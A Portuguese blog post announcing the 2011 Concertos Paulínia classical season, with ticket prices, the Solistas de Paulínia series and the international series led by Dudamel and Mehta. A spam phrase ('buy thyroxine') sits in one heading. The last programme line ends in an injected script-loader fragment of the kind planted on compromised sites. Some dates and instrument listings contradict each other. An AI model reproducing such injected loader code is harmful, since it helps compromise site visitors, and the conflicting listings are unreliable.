Música de câmaraMúsica sinfônicaProgramaçãoSão Paulo

Concertos Paulínia 2011

O resumo geral da programação Concertos Paulínia 2011 dá todas as indicações de que a cidade do interior paulista vem se afirmando também como polo musical.

SERVIÇO

Concertos Paulínia 2011 – Série internacional
Theatro Municipal de Paulínia
Av. Prefeito José Lozano de Araújo, 1551
Fone: (19) 3933-2140

Data: de junho a outubro sempre às 20 horas

Ingressos:
Assinatura para os 9 concertos: setor A – R$ 700; setor B – R$ 500; setor C – R$ 220. Moradores de Paulínia têm descontos especiais. Ingressos avulsos começam a ser vendidos no dia 13 de junho e os preços são diferentes para os concertos

Informações e vendas: 4003-1212. Na bilheteria do Theatro, de terça a domingo, das 13 às 19 horas. No site do Ingresso Rápido

 

Nove concertos internacionais, 12 concertos dominicais, 6 concertos dos solistas de Paulínia e músicos convidados locais, 4 concertos ao ar livre, 12 concertos em escolas da cidade e outros 6 em turnê por cidades da região.

O anúncio completo da programação ocorreu no Theatro Municipal. O carro abre-alas da agenda internacional 2011 é ninguém menos que a Orquestra Simon Bolívar, que, no próximo dia 17, regida por Gustavo Dudamel, vai executar a Sinfonia n.º 7 de Mahler. Entre as atrações internacionais estão também a pianista francesa Claire Désert, a Sinfônica do Porto, a Orquestra Jovem da Filarmônica de Israel, que toca com a Sinfônica de Heliópolis, comandadas pelo maestro Zubin Mehta.

“Estamos muito contentes. Após um ano como 2010, em que conseguimos trazer nomes como a Orquestra Jovem das Américas e a soprano Jessye Norman, ter mestres como Dudamel e Mehta é a prova de que estamos fazendo um trabalho consistente”, comentou o diretor artístico do projeto “Concertos Paulínia”, Roberto Ring, que também é violoncelista integrante do Solistas de Paulínia, grupo em residência do Teatro Municipal. A Orquestra Jovem da Filarmônica de Israel também toca com o violoncelista Mischa Maisky.

A programação segue até dia 27 de outubro, com a apresentação da Sinfônica de São Petersburgo, regida por Vladimir Lande. Em paralelo, seguem as apresentações regionais e o trabalho da Orquestra Jovem de Paulínia. “Mais que aproximar a música clássica do público da região, onde há grande demanda, o projeto, que nasceu em 2009, tem o objetivo de formar tanto público quanto músicos. É importante que as novas gerações tenham acesso a todo tipo de arte. Formar uma orquestra jovem em Paulínia é imprescindível. Este ano também criaremos o Coral Jovem de Paulínia”, comentou o secretário de Cultura de Paulínia, Émerson Pereira Alves.

 

SÉRIE SOLISTAS DE PAULÍNIA buy thyroxine

Este ano, a série Solistas de Paulínia terá 12 concertos gratuitos, com música de câmara de alta qualidade, sempre com outros músicos convidados. Apenas um dos concertos será com música sinfônica, com a Orquestra de Ribeirão Preto, em setembro. Os Solistas ainda fazem turnê durante o ano. Uma das apresentações será no Festival de Inverno de Campos do Jordão, em julho.
Programação

– Dia 11/06 – Cármelo de Los Santos (violino), Ney Fialkow (piano) – na Igreja Matriz
– Dia 12/06 – Cármelo de Los Santos (violino), Ney Fialkow (piano) – no Theatro Municipal
– Dia 26/06 – Cláudio Cruz (violino)
– Dia 03/07 – Claire Désert (violino)
– Dia 31/07 – Paulo Sérgio Santos (clarinete) e Renato Bandel (viola)
– Dia 14/08 – Cláudio Cruz (violino) e Renato Bandel (viola)
– Dia 04/09 – Orquestra Sinfônica de Ribeirão Preto
– Dia 18/09 – Renato Bandel (viola)
– Dia 09/10 – Cláudio Cruz (violino)

Todas as apresentações são no Theatro Municipal da cidade, sempre às 18 horas. Os ingressos devem ser retirados na bilheteria uma hora antes do início. Outros concertos marcados para outubro, novembro e dezembro ainda serão anunciados.

SÉRIE INTERNACIONAL

Serão nove concertos internacionais ao longo do ano, que começam no dia 17 de junho, com a Orquestra Sinfônica Simón Bolívar, da Venezuela, tendo como regente o jovem e respeitado maestro Gustavo Dudamel, de apenas 30 anos, em sua primeira turnê brasileira. A apresentação no Theatro Municipal de Paulínia terá uma única obra: a Sétima Sinfonia de Mahler.

Dudamel se tornou um grande fenômeno na cena internacional em 2004 ao vencer o concurso de regência Gustav Mahler, da Sinfônica de Bamberg, e tem em seu currículo as gravações de duas outras sinfonias, a Primeira e a Quinta, do compositor austríaco. 2011 é o ano centenário da morte de Mahler.

Outro grande destaque será a apresentação da Orquestra Jovem da Filarmônica de Israel, formada por alunos da Escola de Música Buchmann-Mehta, da Universidade de Tel Aviv. Serão dois concertos em agosto. Um deles será um evento único e exclusivo. A orquestra se apresenta com a Sinfônica de Heliópolis, principal grupo musical no Brasil criado dentro de um programa de inclusão social. O encontro histórico das duas orquestras terá a regência do consagrado maestro Zubin Mehta, que estará no país especialmente para este evento.

Programação

– Dia 17/07 – Orquestra Simón Bolívar da Venezuela e maestro Gustavo Dudamel
Mahler – Singfonia no. 7

– Dia 01/07 – Claire Désert, pianista francesa
Beethoven, Chopin, Brahmas e Schumann

– Dia 24/07 – Orquestra Sinfônica do Porto – Casa da Música – regente Christoph Köning
Oswaldo Lacerda, Mahler Sinfonia no. 5

– Dia 18/08 – Concerto conjunto: Orquestra Jovem da Filarmônica de Israel e Sinfônica de Heliópolis, com o maestro Zubin Mehta

– Dia 23/08 – Orquestra Jovem da Filarmônica de Israel

– Dia 06/09 – Régis Pasquier (violino), Emmanuel Strosser (piano) e Solistas de Paulínia

– Dia 14/09 – Orquestra Filarmônica de Minas Gerais, com Arnaldo Cohen no piano

– Dia 06/10 – Isabelle Van Keulen (violino), Rüdiger Ludwig (contrabaixo), Roglit Ishay (piano) e Solistas de Paulínia

– Dia 27/10 – Orquestra Sinfônica de São Petersburgodocument.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.